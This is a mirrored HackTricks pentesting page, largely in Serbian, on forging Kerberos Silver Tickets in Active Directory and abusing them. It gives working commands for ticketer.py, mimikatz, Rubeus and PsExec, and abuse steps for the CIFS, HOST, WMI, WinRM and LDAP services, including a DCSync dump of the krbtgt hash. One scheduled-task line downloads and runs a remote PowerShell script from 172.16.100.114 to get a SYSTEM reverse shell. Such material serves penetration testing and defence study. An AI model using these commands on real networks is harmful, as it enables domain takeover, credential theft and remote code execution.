mirror of https://github.com/carlospolop/hacktricks synced 2024-11-22 20:53:37 +00:00

Translator 9640d5fdb6 Translated ['pentesting-web/browser-extension-pentesting-methodology/REA

2024-07-19 16:13:40 +00:00

9.2 KiB

Raw Blame History

Silver Ticket

{% hint style="success" %} Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

{% endhint %}

Bug bounty tip: sign up for Intigriti, a premium bug bounty platform created by hackers, for hackers! Join us at https://go.intigriti.com/hacktricks today, and start earning bounties up to $100,000!

{% embed url="https://go.intigriti.com/hacktricks" %}

Silver ticket

Napad Silver Ticket uključuje eksploataciju servisnih karata u Active Directory (AD) okruženjima. Ova metoda se oslanja na sticanje NTLM heša servisnog naloga, kao što je nalog računara, kako bi se falsifikovala Ticket Granting Service (TGS) karta. Sa ovom falsifikovanom kartom, napadač može pristupiti specifičnim uslugama na mreži, pretvarajući se da je bilo koji korisnik, obično sa ciljem sticanja administratorskih privilegija. Naglašava se da je korišćenje AES ključeva za falsifikovanje karata sigurnije i manje uočljivo.

Za kreiranje karata koriste se različiti alati u zavisnosti od operativnog sistema:

On Linux

python ticketer.py -nthash <HASH> -domain-sid <DOMAIN_SID> -domain <DOMAIN> -spn <SERVICE_PRINCIPAL_NAME> <USER>
export KRB5CCNAME=/root/impacket-examples/<TICKET_NAME>.ccache
python psexec.py <DOMAIN>/<USER>@<TARGET> -k -no-pass

На Виндовсу

# Create the ticket
mimikatz.exe "kerberos::golden /domain:<DOMAIN> /sid:<DOMAIN_SID> /rc4:<HASH> /user:<USER> /service:<SERVICE> /target:<TARGET>"

# Inject the ticket
mimikatz.exe "kerberos::ptt <TICKET_FILE>"
.\Rubeus.exe ptt /ticket:<TICKET_FILE>

# Obtain a shell
.\PsExec.exe -accepteula \\<TARGET> cmd

CIFS servis je istaknut kao uobičajeni cilj za pristupanje fajl sistemu žrtve, ali se i drugi servisi kao što su HOST i RPCSS takođe mogu iskoristiti za zadatke i WMI upite.

Dostupne Usluge

Tip Usluge	Usluge Silver Tickets
WMI	HOST RPCSS
PowerShell Remoting	HOST HTTP U zavisnosti od OS takođe: WSMAN RPCSS
WinRM	HOST HTTP U nekim slučajevima možete samo tražiti: WINRM
Zakazani Zadaci	HOST
Windows Deljenje Fajlova, takođe psexec	CIFS
LDAP operacije, uključujući DCSync	LDAP
Windows Alati za Udaljenu Administraciju	RPCSS LDAP CIFS
Zlatni Tiketi	krbtgt

Koristeći Rubeus možete tražiti sve ove tikete koristeći parametar:

/altservice:host,RPCSS,http,wsman,cifs,ldap,krbtgt,winrm

Event ID-ovi za Silver tikete

4624: Prijava na nalog
4634: Odjava sa naloga
4672: Prijava administratora

Zloupotreba Uslužnih tiketa

U sledećim primerima zamislimo da je tiket preuzet imitujući administratorski nalog.

CIFS

Sa ovim tiketom bićete u mogućnosti da pristupite C$ i ADMIN$ folderu putem SMB (ako su izloženi) i kopirate fajlove u deo udaljenog fajl sistema jednostavno radeći nešto poput:

dir \\vulnerable.computer\C$
dir \\vulnerable.computer\ADMIN$
copy afile.txt \\vulnerable.computer\C$\Windows\Temp

Moći ćete da dobijete shell unutar hosta ili izvršite proizvoljne komande koristeći psexec:

{% content-ref url="../lateral-movement/psexec-and-winexec.md" %} psexec-and-winexec.md {% endcontent-ref %}

HOST

Sa ovom dozvolom možete generisati zakazane zadatke na udaljenim računarima i izvršiti proizvoljne komande:

#Check you have permissions to use schtasks over a remote server
schtasks /S some.vuln.pc
#Create scheduled task, first for exe execution, second for powershell reverse shell download
schtasks /create /S some.vuln.pc /SC weekly /RU "NT Authority\System" /TN "SomeTaskName" /TR "C:\path\to\executable.exe"
schtasks /create /S some.vuln.pc /SC Weekly /RU "NT Authority\SYSTEM" /TN "SomeTaskName" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://172.16.100.114:8080/pc.ps1''')'"
#Check it was successfully created
schtasks /query /S some.vuln.pc
#Run created schtask now
schtasks /Run /S mcorp-dc.moneycorp.local /TN "SomeTaskName"

HOST + RPCSS

Sa ovim tiketima možete izvršiti WMI u sistemu žrtve:

#Check you have enough privileges
Invoke-WmiMethod -class win32_operatingsystem -ComputerName remote.computer.local
#Execute code
Invoke-WmiMethod win32_process -ComputerName $Computer -name create -argumentlist "$RunCommand"

#You can also use wmic
wmic remote.computer.local list full /format:list

Nađite više informacija o wmiexec na sledećoj stranici:

{% content-ref url="../lateral-movement/wmiexec.md" %} wmiexec.md {% endcontent-ref %}

HOST + WSMAN (WINRM)

Sa winrm pristupom preko računara možete pristupiti i čak dobiti PowerShell:

New-PSSession -Name PSC -ComputerName the.computer.name; Enter-PSSession PSC

Proverite sledeću stranicu da biste saznali više načina za povezivanje sa udaljenim hostom koristeći winrm:

{% content-ref url="../lateral-movement/winrm.md" %} winrm.md {% endcontent-ref %}

{% hint style="warning" %} Imajte na umu da winrm mora biti aktivan i slušati na udaljenom računaru da biste mu pristupili. {% endhint %}

LDAP

Sa ovom privilegijom možete dumpovati DC bazu koristeći DCSync:

mimikatz(commandline) # lsadump::dcsync /dc:pcdc.domain.local /domain:domain.local /user:krbtgt

Saznajte više o DCSync na sledećoj stranici:

Reference

{% content-ref url="dcsync.md" %} dcsync.md {% endcontent-ref %}

Bug bounty savet: prijavite se za Intigriti, premium bug bounty platformu koju su kreirali hakeri, za hakere! Pridružite nam se na https://go.intigriti.com/hacktricks danas, i počnite da zarađujete nagrade do $100,000!